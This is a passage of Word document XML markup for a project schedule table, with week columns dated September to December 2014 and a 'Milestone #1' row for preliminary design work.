        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 1 (09.22.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="886" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 5 (10.20.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="923" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 7 (11.03.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="904" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="904" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="941" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 11 &amp; 12 (12.01.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="886" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="923" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="904" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="904" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="941" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestone #1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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Preliminary Design Work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="246" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="D9EAD3" w:fill="D9EAD3"/>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single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="38761D" w:fill="38761D"/>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nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
